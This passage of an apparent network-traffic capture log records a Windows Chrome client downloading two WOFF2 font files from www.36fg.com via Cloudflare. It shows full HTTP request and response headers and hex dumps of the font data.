                                                        Data Ascii: IgZ2vlf,YbXoIX_'5]J2P92C@C6EeB@A9y]H- b9O0uwI7Jx2\Vf=nVV"#9v8xmpAhy3pQ%t^ |]YB8jCn#&


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.549779104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC677OUTGET /static/fonts/4icv6kvjbnbylgocxcvjsgyn.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:58 UTC939INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:58 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 28968
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        etag: "60e7ae74-7128"
                                                        strict-transport-security: max-age=31536000
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: REVALIDATED
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jp7DYII4ct6rStoQhHx5dzxx%2BwQeVgKYgIIDh1oA3D8RcmtwN5bJ6%2BuPFLzbzJeRUUIX7GzON2010nC3qx2bNlJTk9jcJnne86lZSixhj%2BV%2BXH%2Fzvw5fD0SMIDEXS2o%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b51faa72b7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2174&min_rtt=2026&rtt_var=866&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1249&delivery_rate=1441263&cwnd=181&unsent_bytes=0&cid=64d0fef881761fcf&ts=368&x=0"
                                                        2025-03-15 00:17:58 UTC430INData Raw: 77 4f 46 32 00 01 00 00 00 00 71 28 00 12 00 00 00 01 0f 64 00 00 70 bf 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b fe 08 1c 8e 0a 06 60 16 ad 56 00 81 70 08 84 14 09 8c 23 11 10 0a 81 f7 60 81 dc 15 0b 84 18 00 12 bb 48 01 36 02 24 03 88 2c 04 20 05 82 5e 07 88 6a 0c 82 7f 1b 48 fe 57 d0 dd 76 9e 22 f5 06 d0 5f d3 db 36 01 0e b8 63 6e 47 22 10 a5 bd e8 82 e9 36 4f 04 ce 03 c5 7e 5c 3a 93 fd ff ff 7f 6a b2 21 63 71 4c 0f 60 6e 53 d5 2a eb 7b 20 9a 47 84 92 5e 33 16 b6 a5 d6 14 f3 6e 23 c7 da 65 db 97 1a d2 7c a5 c4 26 8b 1c be 35 8d 2b 9c 44 4a d3 a8 5e 54 59 b0 a9 2c e8 fa 68 6a c0 ae 30 c4 15 93 a6 71 fa 44 e7 43 06 1a 9c 34 e1 7a 88 d7 10 c7 67 f6 17 e5 0d 5e ab 24 71 25 6c d8 a2 a9 ef 1b ee 92 e7 e4 bd a8 15 ec 72 4d 12
                                                        Data Ascii: wOF2q(dp`Vp#`H6$, ^jHWv"_6cnG"6O~\:j!cqL`nS*{ G^3n#e|&5+DJ^TY,hj0qDC4zg^$q%lrM
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 88 5a 24 b5 31 7a 30 22 cb c0 04 a3 a0 55 14 15 a3 01 c5 8e f7 4d f4 f9 7f 23 d3 0f 75 7e bd e5 fc b1 d8 b2 2d 2b 8a 9d e4 93 17 08 5b a4 ae 5c 3e 2a 1a ac ca 6b aa 05 c2 03 9a ff 3f 35 fd ba f7 3d e0 e1 21 be 07 10 20 40 30 81 a1 48 16 43 81 a1 4a 12 95 00 85 6f 97 d5 a1 c4 ae a3 66 6b 41 97 d4 6a 75 48 25 75 98 91 aa ec 2e 76 48 2b ff 99 bc 1a 7b 26 ef ac 4e 59 dd c7 d6 c4 f2 f7 24 4d b2 e4 bf 9a 5d 4d 48 ab b1 45 54 8d f1 6f cf de 07 24 8d 12 08 2c 92 22 45 49 2c 81 90 af 62 4c 58 11 2b 32 2e 3a 3b f4 db 5e be 16 28 5c 17 71 88 62 4d 5f 2c 9a e2 f7 83 b6 ff bd e3 c0 20 a8 fd 40 b4 5a a4 9b 0d dd 6e 36 19 0c 39 98 e7 ef 75 66 ef 49 06 dc 00 79 46 71 f4 bd 7f ed 05 2f 83 78 c1 21 db eb 89 14 94 4c b1 03 5e 07 80 14 2c ca ab ae fe 3a 74 ae da 9b fe e6 8a
                                                        Data Ascii: Z$1z0"UM#u~-+[\>*k?5=! @0HCJofkAjuH%u.vH+{&NY$M]MHETo$,"EI,bLX+2.:;^(\qbM_, @Zn69ufIyFq/x!L^,:t
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 1a a9 2a cf 2a 57 18 ca b3 a8 9a ed ba 80 87 fd 4c 31 9f 1f a5 2f 9c e1 12 01 a7 32 77 33 13 2d e6 72 5c 40 4a d6 90 dd c0 a7 6c 18 ad f4 8e d9 bd f0 f6 45 bf 54 2b 01 6f 3f 28 8c d5 16 fd 59 4b 2c 83 b6 29 bc 93 17 5d 2a 2a 78 49 d8 af ec a3 bc 85 32 52 bb 43 29 03 b3 99 44 44 3e 76 a0 33 27 ec cd 3c 55 7d ef 65 97 96 b3 a4 b9 9b cf d5 73 35 82 9a 89 c8 4b eb 77 94 82 16 28 ed ab 11 92 98 1e 52 aa 8d fc d2 79 13 e1 cd 60 21 db fa 2c 81 fd 32 c1 52 e1 19 4e b3 d6 0b 2b 88 f3 4c 6e 44 be 23 9c f9 d3 31 53 64 05 8e f6 cb 9c 5f 39 3a 71 92 e1 c5 85 30 cb 9b 6a a5 6f 5b 91 02 93 2b 07 10 f6 00 6b 50 7a 0f 96 81 5f e1 42 99 b2 96 ad 7f 2b ab 00 78 b9 28 70 b1 62 ca a8 c5 7a e2 18 22 a9 df 1e 32 1f 78 d6 61 94 1d 1c a5 a4 c7 74 92 2c ff 36 72 d9 53 e7 ef 48 ae
                                                        Data Ascii: **WL1/2w3-r\@JlET+o?(YK,)]**xI2RC)DD>v3'<U}es5Kw(Ry`!,2RN+LnD#1Sd_9:q0jo[+kPz_B+x(pbz"2xat,6rSH
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 2c a7 03 e3 e0 85 45 99 c1 e6 2c a5 3f 35 19 0e d5 de b7 95 18 ab 4d a3 6a 96 63 8c 52 41 1e ff 6c 41 e7 89 58 ce b9 79 01 38 d3 dd 01 29 e5 08 eb 29 0c 4d a8 72 fc 10 07 53 f6 c6 33 49 53 49 2d 1f 1c 65 61 f5 36 2f 5f 94 cd 20 ad 65 db 4c 59 be 3f 40 63 52 b3 fd 0c 35 82 93 0b 07 2d 62 0f d0 91 85 fd 11 89 89 f5 cc 5a ac 73 9f 61 cd df 2d 0f de c2 78 b8 ca 8b 79 d3 26 38 a4 13 1b ef 6e 34 04 8a 5d 34 f8 ff 6b d6 15 62 0a 4a b8 89 0f ac e6 4b 21 30 51 20 d7 ba ed a2 8b 12 1e a6 56 de f6 d6 ec c1 46 f5 43 6f 50 e1 12 06 03 9a ac c1 00 3f 67 f7 32 ae 5c 2f 27 2a 20 ba 7d 35 33 d3 69 1c 51 b5 a3 12 a9 d7 a2 33 e6 7c 46 2d 39 fd 60 6e 9c ad 50 a0 ad a3 9c 79 31 03 7d 38 77 14 64 a3 ff b6 90 d5 37 a0 94 6c 4a 23 30 f1 57 4b 82 6d 65 31 51 d3 c1 c8 e6 e8 b1 a1
                                                        Data Ascii: ,E,?5MjcRAlAXy8))MrS3ISI-ea6/_ eLY?@cR5-bZsa-xy&8n4]4kbJK!0Q VFCoP?g2\/'* }53iQ3|F-9`nPy1}8wd7lJ#0WKme1Q
                                                        2025-03-15 00:17:58 UTC1369INData Raw: e0 7c 8c e0 7d 8e 10 bc 8c 10 09 f5 af 4a d7 e2 45 bc 84 b7 f0 36 de c1 bb 78 0f ef e3 23 7c 8c 4f f0 29 3e c3 e7 f8 c2 7d 49 7c 32 b4 a3 25 39 ab 9b 0d 7c a4 c1 1f 2c 79 f8 4f a5 10 5e c2 db 78 17 ef e3 63 7c 8a cf 33 8e aa 4e f9 f0 93 fa 13 e0 ad ea 6b bc 85 b7 f1 2e de c3 27 f8 14 9f 7f d8 17 26 78 c9 94 65 d6 d9 66 9f 65 7b 71 f0 2f f8 5f a5 2d bc 8d 77 f1 3e 3e c5 e7 19 67 a4 7e 13 e0 df f8 0e d9 0a e1 1d bc 8b f7 f0 3e 3e c3 e7 f8 c2 79 19 f3 f7 18 c1 3f a0 e2 1f bc fb c6 cf 2d a4 94 1a 33 56 d8 e0 7d e4 9e 83 b5 c6 7b 78 1f 5f f0 9d c3 23 2a 69 bc cf 3a f5 e4 05 bc 3e f4 be 39 72 cb 3d 99 87 5e 30 08 e0 de f4 cd 59 73 df 72 db 1d 77 4b c7 f7 8f 63 86 cc c0 f4 87 9e 29 6f 87 d8 99 02 c9 d9 78 e6 7a 79 20 c2 84 67 5b 06 c0 82 a2 9d 1f c6 a6 e8 90 b6
                                                        Data Ascii: |}JE6x#|O)>}I|2%9|,yO^xc|3Nk.'&xefe{q/_-w>>g~>>y?-3V}{x_#*i:>9r=^0YsrwKc)oxzy g[
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 59 dd 34 a5 86 6a 57 62 4d 73 15 5b 5b 87 1c 1b 6e 91 42 eb 5a a6 c0 fa 7a 25 6f 68 40 9e 91 56 5f 7a 63 c3 72 6d 6a 44 8e cd 6d 96 6d 4b 3b 64 d9 da a8 4c db da 2b c3 f6 f6 4b b7 a3 23 d2 ec ec 04 ab 5d 9d 96 6a 77 17 e4 d8 68 7f 4b 31 d6 35 c9 c6 9b 94 fd 7b fa 57 92 bd dd 95 68 a2 fb 12 ec eb b1 78 fb 7b 21 ce 81 5e 4b 3e d8 7b 66 87 fa 92 0f f7 93 c9 91 7e ff 9f 22 8e 0e bb a9 d1 b1 e1 34 8d 76 7c b8 4e a3 9c 18 b0 69 a4 93 03 25 c2 a9 81 13 ee f4 20 32 38 33 28 f4 ce 0e 26 bd 44 b4 01 e0 de c4 c1 69 91 61 ef bb db 26 b4 da 92 6f 1b 7b a4 3f 74 3d b1 73 70 4e cf d4 fc f7 8c 4e e2 a4 96 34 93 4e 72 31 b9 49 6a c8 d6 51 77 d3 6b 06 6f fe 00 ce d5 37 f4 d0 fc 04 95 44 49 e5 59 f3 5b b1 3f 79 d0 d7 7b 18 f0 ff 15 e3 47 1f fe 58 55 29 de ff f0 e4 0f c3 e2
                                                        Data Ascii: Y4jWbMs[[nBZz%oh@V_zcrmjDmmK;dL+K#]jwhK15{Whx{!^K>{f~"4v|Ni% 283(&Dia&o{?t=spNN4Nr1IjQwko7DIY[?y{GXU)
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 25 d2 9c 3b 8a 55 8d d1 46 51 d6 7e b1 d0 cb 27 a9 0f df 03 a2 0e 73 75 e6 6a 92 67 23 0f c6 2c d9 a1 2a 99 63 96 4e f2 9a 8d aa ad 74 80 41 73 ed ba 15 13 a3 ef 5c 0a 54 fd 92 3b a4 84 6c b7 9b 6c 01 67 4b aa 56 4d c3 55 55 81 92 e8 cc 50 d2 9a 28 87 ec 08 d5 bb 27 39 56 c2 30 33 b7 6b 22 c7 6e 46 a2 e2 07 39 e3 c1 9d 0e 8c d3 93 92 69 92 52 40 1e cc db 3c 25 72 97 c4 31 f8 3b 0c c3 60 8d 05 84 ff 02 04 55 d9 03 74 27 90 9d d9 fc b8 4f 4c 8a 00 7f 86 90 43 82 24 aa 20 1b 52 fd a7 30 7c be 44 36 8f 10 66 57 5f fa d9 dd 5b 04 41 7b 7e 37 08 82 1d e4 a9 33 0a 9d 0d aa d6 a5 7f 06 3f 7f 99 c7 f2 c3 8f 17 84 d4 02 74 14 64 8c cd 11 65 a1 40 3e 08 30 47 65 d7 9b 78 2f 9d c7 65 1e 14 0c ce 3a ce 1f 02 08 ea 26 4d d1 ad 46 cf 15 47 50 86 25 91 cd 83 f7 f5 47 94
                                                        Data Ascii: %;UFQ~'sujg#,*cNtAs\T;llgKVMUUP('9V03k"nF9iR@<%r1;`Ut'OLC$ R0|D6fW_[A{~73?tde@>0Gex/e:&MFGP%G
                                                        2025-03-15 00:17:58 UTC1369INData Raw: a8 1b 17 3c 11 12 71 42 51 d3 fc 1f 27 bf 25 f3 65 7c 3e c5 65 66 f9 6b 81 4d b8 5b aa fc 81 7b d3 67 9a 01 88 e4 c8 0e 91 32 33 35 e7 6d 04 08 4f 12 70 27 35 9f d6 fe 4c c9 96 e2 10 d9 66 52 95 2a 2c 89 47 4f 7d f5 04 32 22 36 c1 1a 92 cd b8 e9 d9 9f 45 c3 f1 4b 0b 0a 08 dc e9 cb 89 a6 4b 73 12 73 0f 83 04 9d 63 47 12 14 32 ca 33 20 32 f6 fe cf 12 a0 23 d0 65 4d 5a 40 06 aa c2 0e c8 3c 91 d5 29 7c 45 7b f0 aa 8b bf 4b bf fc f8 63 2e e5 71 2c 8b 2b 21 ee 38 f8 ba b2 13 f6 8e bb 7b ca 8c ed 07 6a 4b 34 5d ed f9 9d cd b7 8f 5e e1 c4 66 57 d1 2d f9 e1 85 ca b5 aa 0b 65 23 a4 b0 c8 75 52 74 e1 13 fc b3 0c 4c cb 73 28 08 24 94 78 8e 22 d5 d0 0c 47 7a 7a 7d fa 60 b7 7e cc b2 ef 33 ee d6 fe 83 7e ef 9f 90 70 ea f5 46 99 43 bb 49 19 d7 6e d3 9a 3a a6 71 ac a6 63
                                                        Data Ascii: <qBQ'%e|>efkM[{g235mOp'5LfR*,GO}2"6EKKsscG23 2#eMZ@<)|E{Kc.q,+!8{jK4]^fW-e#uRtLs($x"Gzz}`~3~pFCIn:qc
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 73 ce 58 e7 ae 5d d9 df 1f b7 30 f6 72 d2 94 8e db 5b d8 4a 6e 52 61 9a d5 4b 83 7b de 40 0f 51 a7 19 cb cb db dd b0 cd 30 e4 e0 2b d1 da 0f c1 71 96 be 96 3d ff 4f 2b e4 2b b5 56 c6 1c 50 dd 21 86 1d d9 bc 84 c2 7f a4 58 3d 34 39 6c b9 72 4c 09 5e 63 d2 38 54 c2 e5 da 77 57 ce 9c fc 12 2e 86 56 ce cf de e4 56 e9 6d a0 df e2 d7 19 6e 04 c5 e5 2b e3 b2 52 3e 75 76 32 c2 48 24 5b 72 7c a5 3c 3a 52 6f 1a 11 01 ec bd fe f0 ed 68 bd 47 73 fd 09 94 89 05 dd 7b f2 74 4f d3 c7 c2 f0 07 8d 6f ae 2e 0d 09 59 7a f5 4d e3 83 4d bb 8f 4d 3d a7 4f ee 85 b2 4c a8 13 4c 3b 18 7d fb f0 e4 c6 c8 b5 cb b3 dc f1 33 f1 ee 59 cb d7 ce 16 17 8c ec 9b b7 6f a4 95 ee 9e ec 6a 0f 68 e7 54 83 28 51 2a b2 ca b3 86 84 55 20 aa 39 8e b6 14 69 07 57 ca 98 cb 60 de 8c 16 2d 62 b1 16 89
                                                        Data Ascii: sX]0r[JnRaK{@Q0+q=O++VP!X=49lrL^c8TwW.VVmn+R>uv2H$[r|<:RohGs{tOo.YzMMM=OLL;}3YojhT(Q*U 9iW`-b
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 1e 98 4b 62 6a 7c fb 06 c6 4d 57 2d 52 5c cc 73 15 55 28 50 53 9f e3 62 a4 52 9c f9 b9 9a 2a 10 aa 68 cf 71 66 b8 77 b2 cf 9c 14 4b 9b c8 a0 6b 15 59 2d be 73 92 93 fd e6 a4 a5 b4 88 34 63 94 f2 47 10 4f ea c1 81 f5 25 2d ad 23 65 83 de 4f 07 b7 f0 2a 9d 7c 66 21 6c 76 9e f5 8e 89 11 04 93 35 79 0d 32 d9 bf e3 0c cc 1a 79 62 72 40 aa 0a 17 a6 76 aa a2 56 46 d9 96 e1 22 05 7f ef bb 59 e8 13 95 2c 68 35 a9 fa 2b 5a 4d 38 38 b8 be ac d6 a0 b4 3c 33 88 94 42 3d 2f 1a b3 83 ce d1 70 15 4d 7e 51 bf 06 b7 f0 4a 9c a4 b3 10 6b 76 1e 14 26 45 08 7c a5 91 fc 1c b7 3a fa e6 65 7d 70 c6 cf 28 3c 51 45 49 a3 2b c5 62 66 a4 c2 d7 4a 0a d2 e6 92 6d 84 4d 97 b4 58 89 3f 94 86 c2 db 0f f5 c6 1a 39 2a bc 46 92 39 b7 68 be a7 01 b2 78 c6 4d 41 f3 5d 0b 21 21 66 6c f6 15 f1
                                                        Data Ascii: Kbj|MW-R\sU(PSbR*hqfwKkY-s4cGO%-#eO*|f!lv5y2ybr@vVF"Y,h5+ZM88<3B=/pM~QJkv&E|:e}p(<QEI+bfJmMX?9*F9hxMA]!!fl


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.549785104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC679OUTGET /static/fonts/pxibyp8kv8jhgfvrlej6z1xlfq.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:59 UTC934INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:59 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 7988
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        etag: "60e7ae74-1f34"
                                                        strict-transport-security: max-age=31536000
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: REVALIDATED
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIgm1pamBwKXRJ3QFYcmdpJ%2BNHjq6nZ1GnEKtZA7JUNhOKBbFSkUyrW1puWgrV%2BNWoaP7kLTAQWnIpf1NuuIS7Fkm1asPQxAuIv2wctPezcW%2FUHloZDpS5QHCxRqy7I%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b83906c33a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1714&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1251&delivery_rate=1628555&cwnd=237&unsent_bytes=0&cid=f17ffdeab1f95230&ts=334&x=0"
                                                        2025-03-15 00:17:59 UTC435INData Raw: 77 4f 46 32 00 01 00 00 00 00 1f 34 00 0c 00 00 00 00 3f 40 00 00 1e e3 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 20 1c 30 06 60 00 81 54 0a e6 74 d1 2a 0b 83 36 00 01 36 02 24 03 86 68 04 20 05 83 54 07 84 0b 1b ee 31 b3 22 d8 38 00 20 a1 f7 13 45 c9 60 44 b2 ff 2a 81 1b 32 e0 35 54 d1 50 91 a6 6a 42 68 ad 76 63 75 c0 30 56 d4 d0 a0 1d 5d be 84 f8 dd bc 8f f0 0a 5f ec 54 41 a0 84 5a 1f 79 2d b1 7c 3f da 9d b5 23 34 f6 49 2e 4f fc ef 07 ed ce bc bf ae 49 35 34 d3 66 55 21 73 c8 24 32 95 66 12 da 42 ea 2b a1 e0 fe b6 df 6f 7b db 57 c4 b2 58 35 89 fa 48 d9 96 b9 45 b2 96 46 6a 36 f4 3a d7 29 85 63 78 7e 6e ff 07 95 12 8b 0a 65 6c 6c 63 59 c0 c6 ea 2e 9a d8 18 03 16 30 b6 51 23 06 43 06 4a b4 8e 68 f5 bd 87 8a 15 68 7f 40 7d
                                                        Data Ascii: wOF24?@ 0`Tt*66$h T1"8 E`D*25TPjBhvcu0V]_TAZy-|?#4I.OI54fU!s$2fB+o{WX5HEFj6:)cx~nellcY.0Q#CJhh@}
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 63 31 db 45 bf 33 8d 06 4c 70 8f 59 80 b5 b2 36 09 b8 72 4d 95 07 42 38 80 39 01 d5 c9 55 44 2b 73 a3 5e 2d f3 52 c1 a6 02 36 33 3d 07 bb 65 94 d4 28 10 f4 2d 1c 03 b8 ad ca 03 d4 a8 16 fb ad 62 f4 9f 21 6e de 93 68 c1 6b c0 81 1d ab 12 fe 9f 65 5f 6a ea d9 07 c0 db 00 3d d1 cb 80 7d 75 9d 58 60 f4 6d b7 92 91 e1 55 98 84 53 aa 67 32 06 6c b0 b6 9c 67 72 7b a9 ef f4 66 6f ef 8b 82 25 c0 36 c1 e0 30 14 2c 1d 26 86 1d ef 84 c3 23 e0 d1 26 63 4d 4f d1 9e bd 72 4e 8e 84 c5 c1 92 bc 39 bf a9 66 3e 9b 67 e6 1b 73 74 d6 fd 1f fe f3 e2 bb 17 0f 97 2e 2c 9d 5d 3a b3 34 b7 74 7c 69 d7 d2 e8 12 f6 de f9 bb ef dc 7d 0b 04 58 bb 5f d8 ce 7c 0e f8 09 d8 f0 14 d8 76 04 80 b1 1d c8 af 50 b9 82 76 76 61 c4 85 0c 36 8c 63 7f 52 c0 45 1b c1 39 f1 11 3f ce 69 cc a5 80 c3 33
                                                        Data Ascii: c1E3LpY6rMB89UD+s^-R63=e(-b!nhke_j=}uX`mUSg2lgr{fo%60,&#&cMOrN9f>gst.,]:4t|i}X_|vPvva6cRE9?i3
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 72 4a 5b da d7 cf 1e 42 f5 11 f2 25 a7 21 6e 52 71 56 80 6b cd 0e 3e 7a be 24 fc cd f5 d3 ea 1b 7a ec 20 67 03 0d 58 46 92 56 a8 ae 62 39 c2 99 4f db 29 b0 46 61 f5 63 f0 a5 6f 94 d8 bf 7f 0d cb 3a 28 a1 82 18 54 94 e7 ad 14 dc 0a 27 e5 ca 85 95 b9 d9 f9 37 52 70 a9 9c b0 f0 5c 40 39 7e c2 dc db 61 f5 62 62 f6 dd 65 c1 45 21 32 4b 94 a6 14 6b 85 c2 86 b2 f7 ca d1 9c 83 fb 19 61 02 c3 33 fc 15 6c 0d c2 99 17 7b c4 20 7a c7 3e 6e 96 9f cd 61 9b 2c bd 2a 29 be f9 1f 5d be c2 42 b8 55 0b eb d7 e2 ef f9 4b 72 d4 5c ea 27 95 ee 7d bb c2 1d 1e 9e 40 92 f6 36 f2 38 bc ec 72 c4 66 00 23 e8 13 19 ed c2 d6 1b 0d b2 44 79 bf 9a db 05 1a ab 9f c2 63 15 ad ea 0e a7 3a f8 c4 71 50 b2 65 7d 46 5a f4 5a 19 30 f2 bf 5e 2a e3 53 69 9a 06 1e 39 c4 25 7b 2b 86 a7 e7 54 f5 c0
                                                        Data Ascii: rJ[B%!nRqVk>z$z gXFVb9O)Faco:(T'7Rp\@9~abbeE!2Kka3l{ z>na,*)]BUKr\'}@68rf#Dyc:qPe}FZZ0^*Si9%{+T
                                                        2025-03-15 00:17:59 UTC1369INData Raw: c5 f9 6a 26 d3 e8 a6 eb 74 82 e4 43 c9 64 31 72 de 71 72 0b b3 c4 62 7b 13 43 a9 f4 32 c4 76 71 16 b7 c8 b1 1c 3c 40 a3 1e a0 12 de 26 93 af 12 0e be 2f e1 30 a9 62 5e 46 86 28 8b c2 80 d2 39 e0 ee 9e 21 32 8f e5 f0 d5 e4 20 c8 7c 07 3d c3 a5 ac e9 ea ac 1f 6a 38 7f b1 13 7f a0 4a 6f 56 38 d9 cc 22 56 e7 2b 67 5f 65 66 f0 f8 4c 26 4f c8 62 64 0a b9 20 ad eb c6 bd 5b f8 d4 e4 54 a0 3d ce 97 e2 83 fd 2e 03 a3 e8 74 fc 47 72 fa e6 3d 50 f3 f9 d6 da d2 92 2d 0e d7 4a 55 cb aa 23 84 fc 62 02 17 8f c0 13 53 f0 dd 6b 18 16 17 43 ea b8 7e 8e 3f 54 1f 0f 1f d1 9b 5e 72 e4 b0 47 2b 0b 14 f4 7f fb de 29 c4 d3 54 7a 93 56 c9 ed a8 d6 40 86 e7 5d 8d c4 b5 f0 0d 71 ac b8 54 b2 28 ae 8c d6 3c de dd e7 99 77 bb ae 34 b6 8e f5 f4 d9 e4 f0 c8 42 33 ba a1 f6 50 5e e1 4b ce
                                                        Data Ascii: j&tCd1rqrb{C2vq<@&/0b^F(9!2 |=j8JoV8"V+g_efL&Obd [T=.tGr=P-JU#bSkC~?T^rG+)TzV@]qT(<w4B3P^K
                                                        2025-03-15 00:17:59 UTC1369INData Raw: a2 bc 9d ef a7 fa 75 a9 23 bd f2 5d e2 f6 46 a9 34 c3 84 3f 23 1b a4 0e e6 9d 2d 26 65 48 1a 64 a2 8e dc b3 14 8c 5c 88 44 21 5d 81 91 d1 68 18 85 a0 86 33 2e fe 62 3f 58 f6 14 f6 38 52 28 e4 aa a3 fc 58 bf 01 7c 15 52 49 e6 e5 c2 07 b3 ca 31 69 9f c6 27 56 bc 7a 57 93 cc 16 b0 89 74 65 09 4e 54 da 58 12 98 db 0b 0b c2 a0 b6 c7 27 b5 9e bc a2 de f7 08 83 c8 cf 20 56 08 7e ba b0 26 e9 30 4c e0 35 9e 3e 1e 26 f4 08 07 06 07 5a 3d 40 8b c1 0e 4a f6 19 d2 68 82 52 26 bb 42 01 f9 29 94 80 60 0f 48 01 b8 f6 ed 87 27 3f c2 1c fd 10 33 05 e8 39 d8 bd 98 69 7b a7 bd 73 c7 2c 66 c8 76 a0 fc c0 84 73 bf 6d 3f 68 aa 3b 66 3f 36 75 2e fa 42 e4 4c ed d1 b2 a3 53 e7 23 2f 46 03 03 26 da 43 9e 6c 8a bc 93 f8 ca 50 e7 48 27 78 ab fe 2f cf 54 dd 23 e8 91 67 ac 0e 54 ef 7d
                                                        Data Ascii: u#]F4?#-&eHd\D!]h3.b?X8R(X|RI1i'VzWteNTX' V~&0L5>&Z=@JhR&B)`H'?39i{s,fvsm?h;f?6u.BLS#/F&ClPH'x/T#gT}
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 42 54 58 78 f9 7e 65 82 48 c3 55 d7 16 5b 2d 0d b6 50 63 1f 72 01 85 50 26 25 09 37 e4 26 c9 b8 a4 14 c4 fa 8f 0e c4 a6 f6 53 78 fe f4 58 3f 12 08 b2 d7 a8 8f 6d cd 11 d1 c9 5f 7e 32 1d a3 dd e2 30 71 ed 94 f7 72 da 73 7e b6 50 32 98 c1 33 a0 17 b6 37 42 f2 06 a1 41 b3 55 93 59 8c e1 2a ea c5 fc 56 ed 08 2c 44 2b ca 64 e9 84 3b 9f 7f c6 10 ac 69 cc e1 9b 01 bd ee 78 e5 74 94 ae b6 2c 2f 14 dd f5 0f 84 47 14 ea 50 b0 37 ab 0d fc 69 3d 20 51 c4 3f 5a e4 52 8c 75 c8 73 75 ed af f1 b2 65 ed 2d 90 4a 7d db db e5 41 f0 25 31 cd 3f f6 7e e0 a8 81 f3 85 51 2d 30 41 2a 5a c1 64 3a 42 2b 12 f5 14 95 c7 d7 e9 f4 19 20 f5 f7 2b 68 fc e7 6a df 7f be 5b 15 89 65 41 cc 57 4f e1 36 8e 75 90 6f 95 51 0b f4 aa dc 67 29 2b c2 1c 26 2d 95 d1 2a f4 17 a4 31 9f 7e ab 20 db 0b
                                                        Data Ascii: BTXx~eHU[-PcrP&%7&SxX?m_~20qrs~P237BAUY*V,D+d;ixt,/GP7i= Q?ZRusue-J}A%1?~Q-0A*Zd:B+ +hj[eAWO6uoQg)+&-*1~
